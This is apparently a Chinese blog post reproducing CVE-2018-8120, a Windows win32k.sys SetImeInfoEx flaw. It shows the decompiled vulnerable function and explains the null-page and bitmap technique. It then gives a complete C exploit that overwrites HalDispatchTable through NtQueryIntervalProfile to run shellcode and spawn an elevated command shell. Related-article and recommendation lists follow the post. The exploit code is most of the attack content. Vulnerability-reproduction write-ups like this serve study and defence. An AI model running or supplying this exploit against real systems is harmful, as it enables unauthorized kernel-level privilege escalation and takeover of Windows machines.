CVE-2018-8120 漏洞复现

漏洞描述

win32k.sys中函数 SetImeInfoEx未对指针进行合法性检查,从而导致一个任意地址写。

漏洞分析

漏洞成因

int __stdcall SetImeInfoEx(int ProcessWindowStation, _DWORD *userBuf)

{

  int result; // eax

  _DWORD *v3; // eax

  _DWORD *v4; // eax

  result = ProcessWindowStation;

  if ( ProcessWindowStation )

  {

    v3 = *(_DWORD **)(ProcessWindowStation + 0x14);// 没有判断v3的合法性

    while ( v3[5] != *userBuf )

    {

      v3 = (_DWORD *)v3[2];

      if ( v3 == *(_DWORD **)(ProcessWindowStation + 0x14) )

        return 0;

    }

    v4 = (_DWORD *)v3[0xB];                     // v4可以被控制

    if ( !v4 )

      return 0;

    if ( !v4[18] )

      qmemcpy(v4, userBuf, 0x15Cu);             // 任意地址写0x15C字节

    return 1;

  }

  return result;

}

这里的 v3在取出 ProcessWindowStation + 0x14处的指针时,没有对其合法性进行检查,可能为 0。如果我们可以申请到 0地址处的内存,就可以控制 v4,之后 memcpy即可实现任意地址写。

利用手法

当我们使用 CreateWindowStation创建一个新的窗口时,他的 ProcessWindowStation + 0x14会默认为 0。此时我们在通过 NtAllocateVirtualMemory分配内存,并控制好 0地址处相对应的值,便可以实现任意地址写。再利用 bitMap实现更精确的任意地址写,覆盖函数 NtQueryIntervalProfile的函数指针,实现控制程序执行流的目的。

exp

#include<stdio.h>

#include<Windows.h>

#include<Psapi.h>

#include<profileapi.h>

#include "x86-header.h"

DWORD gSyscall = 0x1226;

__declspec(naked) void NtUserSetImeInfoEx(PVOID a)

{

    _asm

    {

        mov esi, a;

        mov eax, gSyscall;

        mov edx, 0x7FFE0300;

        call dword ptr[edx];

        ret 4;

    }

}

int main()

{

    puts("[+] Preparing Bitmap...");

    unsigned int ibuf[0x60] = { 0x90 };

    HANDLE BManager = CreateBitmap(0x60, 1, 1, 32, ibuf);

    HANDLE BWorker = CreateBitmap(0x60, 1, 1, 32, ibuf);

    PVOID Mpvscan0 = getpvscan0(BManager);

    PVOID Wpvscan0 = getpvscan0(BWorker);

    printf("[*] Get Manager: 0x%p\n", Mpvscan0);

    printf("[*] Get Worker: 0x%p\n", Wpvscan0);

    puts("[+] Preparing vul...");

    HWINSTA hSta = CreateWindowStation(

        0,              //LPCSTR                lpwinsta

        0,              //DWORD                 dwFlags

        READ_CONTROL,   //ACCESS_MASK           dwDesiredAccess

        0               //LPSECURITY_ATTRIBUTES lpsa

    );

    SetProcessWindowStation(hSta);

    puts("[*] Get ntdll Module");

    HMODULE hModule = LoadLibraryA("ntdll.dll");

    if (hModule == 0)

    {

        puts("Failed to load ntdll.dll");

        return 0;

    }

    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hModule, "NtAllocateVirtualMemory");

    if (NtAllocateVirtualMemory == 0)

    {

        puts("Failed to resolve NtAllocateVirtualMemory");

        return 0;

    }

    PVOID ZeroAddr = 1;

    ULONG size = 0x1000;

    int NTStatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &ZeroAddr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (NT_SUCCESS(NTStatus) == 0 || ZeroAddr != 0)

    {

        puts("Failed to Allocate to 0 addr");

        printf("Alloc: 0x%p\n", ZeroAddr);

        return 0;

    }

    printf("Alloc Virtual Memory: 0x%p\n", ZeroAddr);

    *(DWORD*)(0x14) = (DWORD)(Wpvscan0);

    *(DWORD*)(0x2C) = (DWORD)(Mpvscan0);

    puts("[+] Trigger vul, modify Manager pvscan0");

    char buf[0x200];

    memset(buf, 0, sizeof(buf));

    PVOID* p = (PVOID*)&buf;

    p[0] = (PVOID)Wpvscan0;

    DWORD* pp = (DWORD*)&p[1];

    pp[0] = 0x180;

    pp[1] = 0x1d95;

    pp[2] = 6;

    pp[3] = 0x10000;

    pp[5] = 0x4800200;

    NtUserSetImeInfoEx(buf);

    PVOID pNtkrnlpaBase = GetKernelBase("ntkrnlpa.exe");

    printf("[*] Get ntkrnlpa.exe kernel base: 0x%p\n", pNtkrnlpaBase);

    HMODULE ntkrnlpaBase = LoadLibraryA("ntkrnlpa.exe");

    if (ntkrnlpaBase == 0)

    {

        puts("Failed to load ntkrnlpa.exe");

        return 0;

    }

    PVOID pUserSpaceAddress = GetProcAddress(ntkrnlpaBase, "HalDispatchTable");

    DWORD HalDispatchTable_4 = (DWORD)pNtkrnlpaBase + ((DWORD)pUserSpaceAddress - (DWORD)ntkrnlpaBase) + 4;

    if (HalDispatchTable_4 != 0)

        printf("[*] Get HalDispatchTable+0x4 0x%lx\n", HalDispatchTable_4);

    PVOID pOrg = 0;

    PVOID sc = &ShellCode;

    SetBitmapBits((HBITMAP)BManager, sizeof(PVOID), &HalDispatchTable_4);

    GetBitmapBits((HBITMAP)BWorker, sizeof(PVOID), &pOrg);

    SetBitmapBits((HBITMAP)BWorker, sizeof(PVOID), &sc);

    NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hModule, "NtQueryIntervalProfile");

    if (NtQueryIntervalProfile == 0)

    {

        puts("Failed to resolve NtQueryIntervalProfile");

        return 0;

    }

    DWORD interVal = 0;

    NtQueryIntervalProfile(0x1337, &interVal);

    SetBitmapBits((HBITMAP)BWorker, sizeof(PVOID), &pOrg);

    CreateCmd();

    return 0;

}

参考链接

https://blog.csdn.net/qq_38025365/article/details/106321131

https://blog.csdn.net/qq_38025365/article/details/106343443

https://www.freebuf.com/vuls/174183.html

https://blog.csdn.net/qq_36918532/article/details/123717955

https://zhuanlan.zhihu.com/p/510326660

https://zhuanlan.zhihu.com/p/51422777

CVE-2018-8120 漏洞复现的更多相关文章

  1. struts2(s2-052)远程命令执行漏洞复现

    漏洞描述: 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为C ...

  2. 8.Struts2-057漏洞复现

    漏洞信息: 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行. url标签未设置va ...

  3. CVE¬-2020-¬0796 漏洞复现(本地提权)

    CVE­-2020-­0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品 ...

  4. Windows CVE-2019-0708 远程桌面代码执行漏洞复现

    Windows CVE-2019-0708 远程桌面代码执行漏洞复现 一.漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP ...

  5. 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞

    漏洞描述 [漏洞预警]Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html ...

  6. ghostscript远程代码执行漏洞复现

    这两天网上ghostscript又又有漏洞信息了,但是没有poc,于是找找资料把今年8月21日的那个验证下 1.关于ghostscript Ghostscript是一套建基于Adobe.PostScr ...

  7. 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复

    20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...

  8. Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析

    0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HT ...

  9. [漏洞复现]CVE-2018-4887 Flash 0day

    1.漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 攻击者 ...

  10. CVE-2018-15982漏洞复现

    作者:欧根 漏洞信息:CVE-2018-15982 Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新.这些更新解决一个  ...

随机推荐

  1. CIO视角|平台工程带来的优势与机遇

    在当今高速发展的技术环境中,企业越来越依赖技术作为创新和竞争优势的战略驱动力.首席信息官(CIO)在企业中负责监督信息和计算机技术的管理和实施,以交付预期的业务成果.在技术是业务核心的公司中,CIO ...

  2. JavaWeb编程面试题——Spring Web MVC

    引言 面试题==知识点,这里所记录的面试题并不针对于面试者,而是将这些面试题作为技能知识点来看待.不以刷题进大厂为目的,而是以学习为目的.这里的知识点会持续更新,目录也会随时进行调整. 关注公众号:编 ...

  3. 解决google翻译出错问题

    解决google翻译问题 一.为什么失效 因为google把google翻译的API给关闭了,导致翻译不了. 据网上说是服务器耗钱,但盈利不够导致的. 二.可修复的前提 国内还存有服务器可以用API ...

  4. 20200825 BAT批处理文件详细教程

    原文链接:https://www.jb51.net/article/151923.htm 纯转载.侵删. 第一章 批处理基础 第一节 常用批处理内部命令简介 批处理定义:顾名思义,批处理文件是将一系列 ...

  5. 3. Servlet原理

    Servlet 是 Java Web 应用程序中的重要组件之一,它是一个 Java 类,用于处理客户端 HTTP 请求和生成 HTTP 响应.Servlet 的原理如下: 服务器启动时,Servlet ...

  6. Docker和Kubernetes与容器自动化扩展:最佳实践

    目录 1. 引言 2. 技术原理及概念 2.1 基本概念解释 2.2 技术原理介绍 2.3 相关技术比较 3. 实现步骤与流程 3.1 准备工作:环境配置与依赖安装 3.2 核心模块实现 3.3 集成 ...

  7. O2OA(翱途)开发平台如何在流程表单中使用基于Vue的ElementUI组件?

    本文主要介绍如何在O2OA中进行审批流程表单或者工作流表单设计,O2OA主要采用拖拽可视化开发的方式完成流程表单的设计和配置,不需要过多的代码编写,业务人员可以直接进行修改操作. 在流程表单设计界面, ...

  8. iOS CoreData总结

    相关主要类: NSManagedObjectContext 管理对象,上下文,持久性存储模型对象,处理数据与应用的交互 NSManagedObjectModel 被管理的数据模型,数据结构 NSPer ...

  9. AI 时代的视频云转码移动端化——更快、更好、更低、更广

    编者按: AI技术的落地是渐渐地从服务器端.云端落地,逐步到移动端及边缘设备上.这些年随着AI技术的进步,轻量级算法模型开始在移动端实时跑起来,并且移动端算法也在不断进行迭代和完善,而对于实时直播场景 ...

  10. PHP递归和循环的速度测试

    本文于 2017-12-05 重新整理. 写了一个可以对 $_GET, $_POST 等输入进行过滤的函数,递归实现如下: function array_map_recursive($filters, ...